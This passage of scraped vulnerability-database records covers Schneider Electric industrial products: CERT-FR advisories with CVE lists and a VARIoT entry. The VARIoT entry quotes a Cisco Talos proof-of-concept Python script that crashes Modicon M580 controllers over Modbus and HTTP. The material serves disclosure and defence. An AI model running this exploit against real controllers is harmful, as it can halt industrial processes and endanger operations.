ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de\nservice \u00e0 distance et un contournement de la politique de s\u00e9curit\u00e9.\n", "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Schneider Electric", "vendor_advisories": [ { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider Electric SEVD-2019-281-02 du 08 octobre 2019", "url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet\u0026p_File_Name=SEVD-2019-281-02_Modicon_Controllers.pdf\u0026p_Doc_Ref=SEVD-2019-281-02" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider Electric SEVD-2019-134-04 du 08 octobre 2019", "url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet\u0026p_File_Name=SEVD-2019-134-04-Floating-License-Manager-Update_V2.1.pdf\u0026p_Doc_Ref=SEVD-2019-134-04" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider Electric SEVD-2018-327-01 du 08 octobre 2019", "url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet\u0026p_File_Name=SEVD-2018-327-01-Embedded-Web-Servers-Modicon+V3.0.pdf\u0026p_Doc_Ref=SEVD-2018-327-01" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider Electric SEVD-2019-281-04 du 08 octobre 2019", "url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet\u0026p_File_Name=SEVD-2019-281-04_Modicon_Controllers.pdf\u0026p_Doc_Ref=SEVD-2019-281-04" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider Electric SEVD-2019-281-01 du 08 octobre 2019", "url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet\u0026p_File_Name=SEVD-2019-281-01_Modicon_Controllers.pdf\u0026p_Doc_Ref=SEVD-2019-281-01" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider Electric SEVD-2019-225-04 du 08 octobre 2019", "url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet\u0026p_File_Name=SEVD-2019-225-04_SoMachine_SoMove_V2.0.pdf\u0026p_Doc_Ref=SEVD-2019-225-04" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider Electric SEVD-2019-281-03 du 08 octobre 2019", "url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet\u0026p_File_Name=SEVD-2019-281-03_Modicon_Controllers.pdf\u0026p_Doc_Ref=SEVD-2019-281-03" } ] }
CERTFR-2022-AVI-1093
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits Schneider. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et un contournement de la politique de sécurité.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneVendor | Product | Description | ||
---|---|---|---|---|
N/A | N/A | Modicon M580 CPU Safety (BMEP58*S et BMEH58*S) toutes versions | ||
N/A | N/A | APC Easy UPS Online Monitoring versions antérieures à 2.5-GA-01-22320 | ||
N/A | N/A | EcoStruxure Power Commission versions antérieures à 2.26 | ||
N/A | N/A | SAITEL DR RTU Baseline 11.06.x antérieures à 1.06.15 |
Title | Publication Time | Tags | |||
---|---|---|---|---|---|
|
{ "$ref": "https://www.cert.ssi.gouv.fr/openapi.json", "affected_systems": [ { "description": "Modicon M580 CPU Safety (BMEP58*S et BMEH58*S) toutes versions", "product": { "name": "N/A", "vendor": { "name": "N/A", "scada": false } } }, { "description": "APC Easy UPS Online Monitoring versions ant\u00e9rieures \u00e0 2.5-GA-01-22320", "product": { "name": "N/A", "vendor": { "name": "N/A", "scada": false } } }, { "description": "EcoStruxure Power Commission versions ant\u00e9rieures \u00e0 2.26", "product": { "name": "N/A", "vendor": { "name": "N/A", "scada": false } } }, { "description": "SAITEL DR RTU Baseline 11.06.x ant\u00e9rieures \u00e0 1.06.15", "product": { "name": "N/A", "vendor": { "name": "N/A", "scada": false } } } ], "affected_systems_content": null, "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n", "cves": [ { "name": "CVE-2019-6846", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6846" }, { "name": "CVE-2022-42971", "url": "https://www.cve.org/CVERecord?id=CVE-2022-42971" }, { "name": "CVE-2020-35198", "url": "https://www.cve.org/CVERecord?id=CVE-2020-35198" }, { "name": "CVE-2021-22791", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22791" }, { "name": "CVE-2022-42973", "url": "https://www.cve.org/CVERecord?id=CVE-2022-42973" }, { "name": "CVE-2019-6841", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6841" }, { "name": "CVE-2021-22779", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22779" }, { "name": "CVE-2021-22790", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22790" }, { "name": "CVE-2022-37301", "url": "https://www.cve.org/CVERecord?id=CVE-2022-37301" }, { "name": "CVE-2018-7241", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7241" }, { "name": "CVE-2021-22786", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22786" }, { "name": "CVE-2018-7242", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7242" }, { "name": "CVE-2019-6844", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6844" }, { "name": "CVE-2019-6842", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6842" }, { "name": "CVE-2020-6996", "url": "https://www.cve.org/CVERecord?id=CVE-2020-6996" }, { "name": "CVE-2022-37300", "url": "https://www.cve.org/CVERecord?id=CVE-2022-37300" }, { "name": "CVE-2021-22789", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22789" }, { "name": "CVE-2019-6847", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6847" }, { "name": "CVE-2021-22792", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22792" }, { "name": "CVE-2022-42970", "url": "https://www.cve.org/CVERecord?id=CVE-2022-42970" }, { "name": "CVE-2019-6843", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6843" }, { "name": "CVE-2018-7240", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7240" }, { "name": "CVE-2020-28895", "url": "https://www.cve.org/CVERecord?id=CVE-2020-28895" }, { "name": "CVE-2022-4062", "url": "https://www.cve.org/CVERecord?id=CVE-2022-4062" }, { "name": "CVE-2022-42972", "url": "https://www.cve.org/CVERecord?id=CVE-2022-42972" } ], "initial_release_date": "2022-12-13T00:00:00", "last_revision_date": "2022-12-13T00:00:00", "links": [], "reference": "CERTFR-2022-AVI-1093", "revisions": [ { "description": "Version initiale", "revision_date": "2022-12-13T00:00:00.000000" } ], "risks": [ { "description": "D\u00e9ni de service \u00e0 distance" }, { "description": "Ex\u00e9cution de code arbitraire \u00e0 distance" }, { "description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es" }, { "description": "Contournement de la politique de s\u00e9curit\u00e9" }, { "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es" } ], "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nSchneider. Certaines d\u0027entre elles permettent \u00e0 un attaquant de\nprovoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de\nservice \u00e0 distance et un contournement de la politique de s\u00e9curit\u00e9.\n", "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Schneider", "vendor_advisories": [ { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider du 13 d\u00e9cembre 2022", "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2022-347-01\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2022-347-01-APC_Easy_UPS_Online_Monitoring_Software_Security_Notification.pdf" } ] }
CERTFR-2022-AVI-717
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits Schneider. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et un contournement de la politique de sécurité.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneVendor | Product | Description | ||
---|---|---|---|---|
N/A | N/A | Eurotherm Data Reviewer3.0.2 software versions antérieures 4.0.0 | ||
N/A | N/A | Modicon Momentum MDI (171CBU*) toutes versions | ||
Schneider Electric | N/A | EcoStruxure Control Expert versions antérieures à 15.2 | ||
Symfony | process | EcoStruxure Process Expert versions antérieures à 2021 | ||
N/A | N/A | Modicon M580 CPU (BMEP* et BMEH*) versions antérieures à 4.01 | ||
Schneider Electric | N/A | Legacy Modicon Quantum toutes versions | ||
N/A | N/A | OPC UA Modicon Communication Module (BMENUA0100) versions antérieures à 2.01 | ||
Schneider Electric | N/A | Modicon MC80 (BMKC80) toutes versions | ||
Schneider Electric | Modicon M340 | Modicon M340 CPU (BMXP34*) versions antérieures 3.50 |
Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
{ "$ref": "https://www.cert.ssi.gouv.fr/openapi.json", "affected_systems": [ { "description": "Eurotherm Data Reviewer3.0.2 software versions ant\u00e9rieures 4.0.0", "product": { "name": "N/A", "vendor": { "name": "N/A", "scada": false } } }, { "description": "Modicon Momentum MDI (171CBU*) toutes versions", "product": { "name": "N/A", "vendor": { "name": "N/A", "scada": false } } }, { "description": "EcoStruxure Control Expert versions ant\u00e9rieures \u00e0 15.2", "product": { "name": "N/A", "vendor": { "name": "Schneider Electric", "scada": true } } }, { "description": "EcoStruxure Process Expert versions ant\u00e9rieures \u00e0 2021", "product": { "name": "process", "vendor": { "name": "Symfony", "scada": false } } }, { "description": "Modicon M580 CPU (BMEP* et BMEH*) versions ant\u00e9rieures \u00e0 4.01", "product": { "name": "N/A", "vendor": { "name": "N/A", "scada": false } } }, { "description": "Legacy Modicon Quantum toutes versions", "product": { "name": "N/A", "vendor": { "name": "Schneider Electric", "scada": true } } }, { "description": "OPC UA Modicon Communication Module (BMENUA0100) versions ant\u00e9rieures \u00e0 2.01", "product": { "name": "N/A", "vendor": { "name": "N/A", "scada": false } } }, { "description": "Modicon MC80 (BMKC80) toutes versions", "product": { "name": "N/A", "vendor": { "name": "Schneider Electric", "scada": true } } }, { "description": "Modicon M340 CPU (BMXP34*) versions ant\u00e9rieures 3.50", "product": { "name": "Modicon M340", "vendor": { "name": "Schneider Electric", "scada": true } } } ], "affected_systems_content": null, "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n", "cves": [ { "name": "CVE-2019-6846", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6846" }, { "name": "CVE-2022-34760", "url": "https://www.cve.org/CVERecord?id=CVE-2022-34760" }, { "name": "CVE-2020-35198", "url": "https://www.cve.org/CVERecord?id=CVE-2020-35198" }, { "name": "CVE-2021-22791", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22791" }, { "name": "CVE-2022-34762", "url": "https://www.cve.org/CVERecord?id=CVE-2022-34762" }, { "name": "CVE-2019-6841", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6841" }, { "name": "CVE-2021-45105", "url": "https://www.cve.org/CVERecord?id=CVE-2021-45105" }, { "name": "CVE-2021-22779", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22779" }, { "name": "CVE-2021-22781", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22781" }, { "name": "CVE-2021-22780", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22780" }, { "name": "CVE-2021-4104", "url": "https://www.cve.org/CVERecord?id=CVE-2021-4104" }, { "name": "CVE-2021-22790", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22790" }, { "name": "CVE-2022-37302", "url": "https://www.cve.org/CVERecord?id=CVE-2022-37302" }, { "name": "CVE-2022-34761", "url": "https://www.cve.org/CVERecord?id=CVE-2022-34761" }, { "name": "CVE-2022-34759", "url": "https://www.cve.org/CVERecord?id=CVE-2022-34759" }, { "name": "CVE-2022-37301", "url": "https://www.cve.org/CVERecord?id=CVE-2022-37301" }, { "name": "CVE-2018-7241", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7241" }, { "name": "CVE-2021-22786", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22786" }, { "name": "CVE-2018-7242", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7242" }, { "name": "CVE-2019-6844", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6844" }, { "name": "CVE-2019-6842", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6842" }, { "name": "CVE-2021-22782", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22782" }, { "name": "CVE-2021-22778", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22778" }, { "name": "CVE-2022-34764", "url": "https://www.cve.org/CVERecord?id=CVE-2022-34764" }, { "name": "CVE-2022-34763", "url": "https://www.cve.org/CVERecord?id=CVE-2022-34763" }, { "name": "CVE-2021-45046", "url": "https://www.cve.org/CVERecord?id=CVE-2021-45046" }, { "name": "CVE-2022-37300", "url": "https://www.cve.org/CVERecord?id=CVE-2022-37300" }, { "name": "CVE-2021-22789", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22789" }, { "name": "CVE-2019-6847", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6847" }, { "name": "CVE-2022-34765", "url": "https://www.cve.org/CVERecord?id=CVE-2022-34765" }, { "name": "CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "name": "CVE-2021-22792", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22792" }, { "name": "CVE-2019-6843", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6843" }, { "name": "CVE-2018-7240", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7240" }, { "name": "CVE-2011-4859", "url": "https://www.cve.org/CVERecord?id=CVE-2011-4859" }, { "name": "CVE-2020-28895", "url": "https://www.cve.org/CVERecord?id=CVE-2020-28895" }, { "name": "CVE-2021-44832", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44832" }, { "name": "CVE-2020-12525", "url": "https://www.cve.org/CVERecord?id=CVE-2020-12525" } ], "initial_release_date": "2022-08-09T00:00:00", "last_revision_date": "2022-09-08T00:00:00", "links": [], "reference": "CERTFR-2022-AVI-717", "revisions": [ { "description": "Version initiale", "revision_date": "2022-08-09T00:00:00.000000" }, { "description": "Mise \u00e0 jour des liens", "revision_date": "2022-08-22T00:00:00.000000" }, { "description": "Mise \u00e0 jour des liens des bulletins de s\u00e9curit\u00e9 Schneider SEVD-2022-221-01, SEVD-2022-221-02 et SEVD-2022-221-04 du 9 ao\u00fbt 2022.", "revision_date": "2022-09-08T00:00:00.000000" }, { "description": "Ajout du libell\u00e9 [SCADA] dans le titre.", "revision_date": "2022-09-08T00:00:00.000000" } ], "risks": [ { "description": "D\u00e9ni de service \u00e0 distance" }, { "description": "Ex\u00e9cution de code arbitraire \u00e0 distance" }, { "description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es" }, { "description": "Contournement de la politique de s\u00e9curit\u00e9" }, { "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es" } ], "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nSchneider. Certaines d\u0027entre elles permettent \u00e0 un attaquant de\nprovoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de\nservice \u00e0 distance et un contournement de la politique de s\u00e9curit\u00e9.\n", "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Schneider", "vendor_advisories": [ { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider SESB-2021-347-01 du 9 ao\u00fbt 2022", "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SESB-2021-347-01\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SESB-2021-347-01_Apache_Log4j_Log4Shell_Vulnerabilities_Security_Notification_V14.0.pdf" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider SEVD-2019-281-02 du 9 ao\u00fbt 2022", "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2019-281-02\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2019-281-02_Modicon_Controllers_Security_Notification_V3.0.pdf" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider SEVD-2022-221-01 du 9 ao\u00fbt 2022", "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2022-221-01\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2022-221-01_EcoStruxure_Control_Expert_Modicon580_Security_Notification_V1.1.pdf" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider SEVD-2022-193-01 du 9 ao\u00fbt 2022", "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2022-193-01\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2022-193-01_OPC_UA_X80_Advanced_RTU_Modicon_Communication_Modules_Security_Notification_V3.0.pdf" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider SEVD-2021-313-05 du 9 ao\u00fbt 2022", "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-313-05\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2021-313-05_Badalloc_Vulnerabilities_Security_Notification_V10.0.pdf" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider SEVD-2022-221-03 du 9 ao\u00fbt 2022", "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2022-221-03\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2022-221-03_EcoStruxure_Control_Expert_Security_Notification.pdf" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider SEVD-2022-221-02 du 9 ao\u00fbt 2022", "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2022-221-02\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2022-221-02_Modicon_Controllers_Security_Notification_V1.1.pdf" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider SEVD-2018-081-01 du 9 ao\u00fbt 2022", "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2018-081-01\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2018-081-01_Embedded_FTP_Servers_for_Modicon_PAC_Controllers_Security_Notification_V3.0.pdf" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider SEVD-2021-222-04 du 9 ao\u00fbt 2022", "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-222-04\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2021-222-04_Modicon_PAC_Controllers_PLC_Simulator_Control_Expert_Process_Expert_Security_Notification_V2.0.pdf" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider SEVD-2021-194-01 du 9 ao\u00fbt 2022", "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-01\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2021-194-01_EcoStruxure_Control_Expert_Process_Expert_SCADAPack_RemoteConnect_Modicon_M580_M340_Security_Notifcation_V4.0.pdf" }, { "published_at": null, "title": "Bulletin de s\u00e9curit\u00e9 Schneider SEVD-2022-221-04 du 9 ao\u00fbt 2022", "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2022-221-04\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2022-221-04-Modicon_Controllers_Ethernet_Modules_Security_Notification_V1.1.pdf" } ] }
var-201910-0580
Vulnerability from variot
A CWE-755: Improper Handling of Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon BMxCRA and 140CRA modules (all firmware versions), which could cause a Denial of Service attack on the FTP service when upgrading the firmware with a version incompatible with the application in the controller using FTP protocol. plural Modicon The product contains an exceptional condition handling vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The Modicon M580/M340/BMxCRA/140CRA are programmable logic controllers from Schneider Electric.
A denial of service vulnerability exists in the Schneider Electric Modicon M580/M340/BMxCRA/140CRA
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201910-0580", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "modicon 140cra", "scope": "eq", "trust": 1.0, "vendor": "schneider electric", "version": "*" }, { "model": "modicon bmxcra", "scope": "eq", "trust": 1.0, "vendor": "schneider electric", "version": "*" }, { "model": "modicon m580", "scope": "eq", "trust": 1.0, "vendor": "schneider electric", "version": "*" }, { "model": "modicon m340", "scope": "eq", "trust": 1.0, "vendor": "schneider electric", "version": "*" }, { "model": "modicon 140cra", "scope": null, "trust": 0.8, "vendor": "schneider electric", "version": null }, { "model": "modicon bmxcra", "scope": null, "trust": 0.8, "vendor": "schneider electric", "version": null }, { "model": "modicon m340", "scope": null, "trust": 0.8, "vendor": "schneider electric", "version": null }, { "model": "modicon m580", "scope": null, "trust": 0.8, "vendor": "schneider electric", "version": null }, { "model": "electric modicon m340", "scope": null, "trust": 0.6, "vendor": "schneider", "version": null }, { "model": "electric modicon m580", "scope": null, "trust": 0.6, "vendor": "schneider", "version": null }, { "model": "electric modicon bmxcra", "scope": null, "trust": 0.6, "vendor": "schneider", "version": null }, { "model": "electric modicon 140cra", "scope": null, "trust": 0.6, "vendor": "schneider", "version": null }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "modicon m580", "version": "*" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "modicon m340", "version": "*" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "modicon bmxcra", "version": "*" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "modicon 140cra", "version": "*" } ], "sources": [ { "db": "IVD", "id": "fdfc7aaf-7b5b-40b9-9299-e58b8cb8fa2a" }, { "db": "CNVD", "id": "CNVD-2019-41494" }, { "db": "JVNDB", "id": "JVNDB-2019-011436" }, { "db": "NVD", "id": "CVE-2019-6847" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:schneider_electric:modicon_140cra_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:schneider_electric:modicon_bmxcra_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:schneider_electric:modicon_m340_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:schneider_electric:modicon_m580_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-011436" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Discovered by Jared Rittle and Patrick DeSantis of Cisco Talos https://talosintelligence.com/vulnerability_reports/ Timeline 2019-06-21 - Vendor Disclosure Summary An exploitable denial of service vulnerability exists in the UMAS REST API getcominfo functionality of the Schneider Electric Modicon M580 Programmable Automation Controller firmware version SV2.80. A specially crafted HTTP request can cause the device to enter a non-recoverable fault state , resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability. Tested Versions Schneider Electric Modicon M580 BMEP582040 SV2.80 Product URLs https://www.schneider-electric.com/en/work/campaign/m580-epac/ CVSSv3 Score 8.6 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H CWE CWE-248: Uncaught Exception Details The Modicon M580 is the latest in Schneider Electric\u0027s Modicon line of Programmable Automation Controllers. The device boasts a Wurldtech Achilles Level 2 certification and global policy controls to quickly enforce various security configurations. Communication with the device is possible over FTP , TFTP , HTTP , SNMP , EtherNet/IP , Modbus , and a management protocol referred to as UMAS. A REST API that allows clients to interact with various pieces of functionality on the device is on the web server , including viewing alarms , querying rack information , and performing select UMAS requests. It is possible to read the registered name of the client holding a PLC reservation by leveraging the /rest/umas/getcominfo UMAS endpoint. In cases where a client has obtained a reservation using a registered name of at least 0x34 bytes , a request to the getcominfo endpoint will sometimes cause the device to enter a non-recoverable fault state. In cases where the fault state does not occur , the HTTP server will become unresponsive. In the non-recoverable fault state , the CPU has entered an error mode where all remote communications have been stopped , process logic stops execution , and the device requires a physical power cycle to regain functionality. Exploit Proof of Concept import structimport socketimport requestsimport random# set up static datarhost = 192.168.10.1rport = 502verbose = Truedef main(): s = socket.socket(socket.AF_INET , socket.SOCK_STREAM) s.connect((rhost , rport)) clientname = A*255 clientnameLen = struct.pack(B , len(clientname)) mbapLen = struct.pack(\u003eH , len(clientname) + 9) transid = struct.pack(\u003eH , random.randint(1 , 255)) msg = {}x00x00{}x00x5ax00x10x3bx0ex00x00{}{}.format(transid , mbapLen , clientnameLen , clientname) s.send(msg) try: uri = http://{}/rest/umas/getcominfo.format(rhost) resp = requests.get(uri , timeout=5) except requests.exceptions.ReadTimeout: print([*] Request timed out. This usually indicates a device fault) except KeyboardInterrupt: print([*] Exiting...) s.close()if __name__ == \u0027__main__\u0027: main() Timeline 2019-06-21 - Vendor Disclosure 2019-08-29 - Vendor requested to reject issue 2019-09-03 - Talos provided additional feedback to substantiate vulnerability 2019-09-20 - Vendor acknowledged issue as vulnerability \u0026 advised plan for October 2019 disclosure 2019-10-08 - Public Release Credit Discovered by Jared Rittle of Cisco Talos,Discovered by Jared Rittle and Patrick DeSantis of Cisco Talos", "sources": [ { "db": "CNNVD", "id": "CNNVD-201910-395" } ], "trust": 0.6 }, "cve": "CVE-2019-6847", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "exploitabilityScore": 8.0, "id": "CVE-2019-6847", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "exploitabilityScore": 8.0, "id": "CNVD-2019-41494", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "exploitabilityScore": 8.0, "id": "fdfc7aaf-7b5b-40b9-9299-e58b8cb8fa2a", "impactScore": 2.9, "integrityImpact": "NONE", "severity": 